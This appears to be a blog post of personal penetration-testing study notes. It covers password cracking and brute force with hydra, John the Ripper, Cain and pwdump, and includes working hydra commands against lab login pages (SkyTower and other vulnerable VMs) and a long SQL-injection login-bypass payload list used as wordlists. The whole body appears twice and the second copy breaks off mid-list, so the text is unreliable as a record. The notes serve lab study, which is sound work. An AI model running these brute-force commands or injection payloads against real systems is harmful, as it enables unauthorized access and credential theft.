========================================
book 4 pg 165; file 4.6 31:37
* if u have no access to hashes, u may want to consider pwd guessing (using tools like thc-hydra) or sniffing clear text or challenge/response exchange (e.g, cain, tcpdump, etc)
* if u have hashes & want to crack the pwd
-for salted hash from unix like, use tradional pwd cracking (john ripper)
-for lanman, nt hash from windows, use rainbow tables, or tradtional pwd cracking (john or cain)
* if you have lanman challenge/response ntlm1 or ntlm2 catures use pwd cracking (cain)
* if u have lanman. nt hash and smbaccess use pass the hash
========================================
file 4.4 3:52 minute
Pwdump tools
a. pwdump3 to pwdump6
b. fgdump
c. pwdump7
========================================
john
* john.pot file = when john cracks a pwd, it displays the result on the screen and stores it in the john.pot file. John will not load pwd that it has already cracked based on what is stored in john.pot. No act name, only pwd format, hash and cracked pwd are stored.
* john.rec file = john stores its current status in the john.rec file. file is updates every 10 minutes in case john or the system crashed.
* a patch to the john source code to extend its feature to crack NT hashes, compile NT-capable John to support SSE2 funtionality.
* to speed up pwd cracking, some tools rely on GPU processing which can be btw 10-50 times faster than cpu for pwd cracking. most of these tools rely on cuda (compute unified device architecture) supported by nvidia graphics cards. free gpu md5 pwd cracker @ http://bvernoux.free.fr/md5/index.php and free cuda multiforcer which supports unsalted md4,md5 and nt hashes. http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf
(book4 pg 99, file 44 36:00)
========================================
Cain (file 4.5 04:00)
* cracks most pwd types that a pen tester will encounter
* It can sniff the pkts and capture pwd also
* traceroute, port usage,wirless scanner
========================================
>> hydra -l Kent -P hydrapasslist.txt 10.0.1.6 http-post-form "/?page=login:user=^USER^&pass=^PASS^&Login=Login:Login failed" -V
where :
/?page => login is the login page for the app
user=^USER^&pass=^PASS^&Login => field USER and PASS are target web site fields. Could be different such as username and password
Login=Login:Login failed => continue until it gets a response that doesnt contain text "Login failed"
Brute force web app
http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
https://blog.g0tmi1k.com/dvwa/login/
https://linuxhint.com/crack-web-based-login-page-with-hydra-in-kali-linux/
-didnt work for doopy vuln machine. showing false positive
===============
hydra for skytower
#-hydra -L hydrauserlist.txt -P hydrapasslist.txt 10.0.1.4 http-post-form "/login.php:email=^USER^&password=^PASS^:F=Login Failed"
--where
--hydrauserlist.txt
popo123
akslda
dasjd
'-'
john@skytech.com
sara@skytech.com
william@skytech.com
JWzXuBJJNy
dasjde1
1dasjd11
--hydrapasslist.txt
popo123
akslda
hereisjohn
dasjd
JWzXuBJJNy
'-'
hereisjohn1
dasjde1
1dasjd11
1senseablesenseable
senseable
ihatethisjob
1hatethisjob
ihateth1isjob
--website : http://10.0.1.4/login.php
email=^USER^&password=^PASS^:F=Login Failed" = email and password are the fields on the form/page that user is expected to fill out. Login Failed is the message that we get if the user/pwd arent correct.
The list below is working with but know that when will show success with any message that is not login failure so sql injection alerts cam out as false negative so I changed the command and start looking for Welcome message with S:. In this case, it is a lot shorter list but only shows one page so with skytower VM it didnt show William or Sata's page which would have to be discovered from DB
--hydrauserlist.txt
source: http://securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
'-'
' '
'&'
'^'
'"'
' or "-'
' or " '
' or "&'
' or "^'
' or "*'
"_"
" "
"&"
"^"
"*"
" or ""_"
" or ""-"
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
--hydrapasslist.txt
'-'
' '
'&'
'^'
'"'
' or "-'
' or " '
' or "&'
' or "^'
' or "*'
"_"
" "
"&"
"^"
"*"
" or ""_"
" or ""-"
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
book 4 pg 165; file 4.6 31:37
* if u have no access to hashes, u may want to consider pwd guessing (using tools like thc-hydra) or sniffing clear text or challenge/response exchange (e.g, cain, tcpdump, etc)
* if u have hashes & want to crack the pwd
-for salted hash from unix like, use tradional pwd cracking (john ripper)
-for lanman, nt hash from windows, use rainbow tables, or tradtional pwd cracking (john or cain)
* if you have lanman challenge/response ntlm1 or ntlm2 catures use pwd cracking (cain)
* if u have lanman. nt hash and smbaccess use pass the hash
========================================
file 4.4 3:52 minute
Pwdump tools
a. pwdump3 to pwdump6
b. fgdump
c. pwdump7
========================================
john
* john.pot file = when john cracks a pwd, it displays the result on the screen and stores it in the john.pot file. John will not load pwd that it has already cracked based on what is stored in john.pot. No act name, only pwd format, hash and cracked pwd are stored.
* john.rec file = john stores its current status in the john.rec file. file is updates every 10 minutes in case john or the system crashed.
* a patch to the john source code to extend its feature to crack NT hashes, compile NT-capable John to support SSE2 funtionality.
* to speed up pwd cracking, some tools rely on GPU processing which can be btw 10-50 times faster than cpu for pwd cracking. most of these tools rely on cuda (compute unified device architecture) supported by nvidia graphics cards. free gpu md5 pwd cracker @ http://bvernoux.free.fr/md5/index.php and free cuda multiforcer which supports unsalted md4,md5 and nt hashes. http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf
(book4 pg 99, file 44 36:00)
========================================
Cain (file 4.5 04:00)
* cracks most pwd types that a pen tester will encounter
* It can sniff the pkts and capture pwd also
* traceroute, port usage,wirless scanner
========================================
>> hydra -l Kent -P hydrapasslist.txt 10.0.1.6 http-post-form "/?page=login:user=^USER^&pass=^PASS^&Login=Login:Login failed" -V
where :
/?page => login is the login page for the app
user=^USER^&pass=^PASS^&Login => field USER and PASS are target web site fields. Could be different such as username and password
Login=Login:Login failed => continue until it gets a response that doesnt contain text "Login failed"
Brute force web app
http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
https://blog.g0tmi1k.com/dvwa/login/
https://linuxhint.com/crack-web-based-login-page-with-hydra-in-kali-linux/
-didnt work for doopy vuln machine. showing false positive
===============
hydra for skytower
#-hydra -L hydrauserlist.txt -P hydrapasslist.txt 10.0.1.4 http-post-form "/login.php:email=^USER^&password=^PASS^:F=Login Failed"
--where
--hydrauserlist.txt
popo123
akslda
dasjd
'-'
john@skytech.com
sara@skytech.com
william@skytech.com
JWzXuBJJNy
dasjde1
1dasjd11
--hydrapasslist.txt
popo123
akslda
hereisjohn
dasjd
JWzXuBJJNy
'-'
hereisjohn1
dasjde1
1dasjd11
1senseablesenseable
senseable
ihatethisjob
1hatethisjob
ihateth1isjob
--website : http://10.0.1.4/login.php
email=^USER^&password=^PASS^:F=Login Failed" = email and password are the fields on the form/page that user is expected to fill out. Login Failed is the message that we get if the user/pwd arent correct.
The list below is working with but know that when will show success with any message that is not login failure so sql injection alerts cam out as false negative so I changed the command and start looking for Welcome message with S:. In this case, it is a lot shorter list but only shows one page so with skytower VM it didnt show William or Sata's page which would have to be discovered from DB
--hydrauserlist.txt
source: http://securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
'-'
' '
'&'
'^'
'"'
' or "-'
' or " '
' or "&'
' or "^'
' or "*'
"_"
" "
"&"
"^"
"*"
" or ""_"
" or ""-"
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
--hydrapasslist.txt
'-'
' '
'&'
'^'
'"'
' or "-'
' or " '
' or "&'
' or "^'
' or "*'
"_"
" "
"&"
"^"
"*"
" or ""_"
" or ""-"
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
Comments
Post a Comment